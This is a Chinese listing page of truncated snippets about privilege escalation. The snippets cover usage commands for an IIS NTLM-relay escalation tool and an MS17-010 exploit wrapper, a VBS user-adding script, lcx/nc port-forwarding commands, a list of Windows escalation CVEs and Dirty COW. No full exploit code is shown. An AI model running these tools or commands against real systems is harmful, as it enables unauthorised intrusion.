[EXP]IIS全版本提权工具】的更多相关文章

工具: iislpe.exe 编译: .net 3.5 全版本IIS提权工具,支持IIS应用池用户/网络服务用户/本地服务用户 原理:       通过NTLM重放将权限提升至SYSTEM权限,详情参考Potato. 用法: IIS Priviledge by k8gegeIIS APPPOOL / Network Service / Local ServiceUseage:iislpe c:\any.batiislpe c:\any.exe 下载:https://files.cnblogs.c…
工具:k8加强版zzz 编译:python 漏洞:MS17-010 用法: zzz_exploit.exe 192.11.22.82zzz_exploit.exe 192.11.22.82 exe参数zzz_exploit.exe 192.11.22.82 exe参数 管道名 如exe启动参数为  m.exe -Start 实战命令为 zzz_exploit.exe 192.11.22.82 -Start 内网批量 可结合cping批量溢出内网,将名称改为smbcheck即可,但exe必须使用无…
[原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53|  分类: 原创工具 VBS提权脚本随机加密生成器[K.8]  Author: QQ吻 QQ:396890445Team: Crack8_编程小组[K.8]Blog: http://qqhack8.blog.163.com 说明:无net.exe.net1.exe提权,可以试试用这个vbs脚本添加系统用户,它通过WSCRIPT.NETWORK来添加用户好处:1 防止某些人 从你提权后 忘了删除的…
在单用户的机器上密码可能没那么重要,但是一旦有多个用户可以使用这台机器,密码就显得十分必要了(比如有儿童账户的电脑).所以说为你的电脑增设一条防线的最常用,最简单的方法就是用密码将你的电脑保护起来,但是现如今这道防线已经不是那么牢不可破了. 前言 在打算给一台电脑排除故障的时候,一种最常见,且最令人头疼的事情就是忘记了密码,而这个问题对于聪明人来说并不是看上去的那么棘手,因为他们有多种方法可以在不知道密码的情况下绕过登录. 比如说如果没人知道密码,那么密码可以从用户账户移除,并用一个启动盘中的程…
http://www.freebuf.com/articles/system/23993.html 在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点).下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物.我知道有更多的“东西”去寻找.这只是一个基本粗略的指南.并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令. 列…
0x00 整理的一些后渗透提权需要用到的一些漏洞,后渗透提权的时候可以看一下目标机那些补丁没打,再进行下一步渗透提权. 0x01 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019)CVE-20…
名字:     AsSystemRun 功能:     用system权限启动一个进程. 开发语言:   C++,C# 作者:     Ack-Code 开发时间: 2016.9.15 实现原理: windows启动服务的时候会默认system权限的,这样的话我们可以自己开发一个服务程序,然后在服务程序里留好通讯接口,然后在开发一套操作界面程序,让界面程序把使用者的请求发送到服务里面,服务程序在启动进程,system程序启动的任何进程,如果不经过降权处理,那么将是system权限的.这样实现了用…
cmd:执行命令的载体cmdshell lcx:端口映射工具 1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口 2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口 3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器 nc:监听工具 A:基本用法 1.连接到REMOTE…
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 自动添加批处理文件管理员权限 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::@echo offCLSECHO.ECHO ==========================…
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复. 360 Vulpecker Team:Android 7.0最新的10月补丁安全级别的系统上测试过漏洞POC,确认Android受影响 为什么这个漏洞叫脏牛(Dirty COW)漏洞? Linux内核的内存子系统在处理写时拷贝…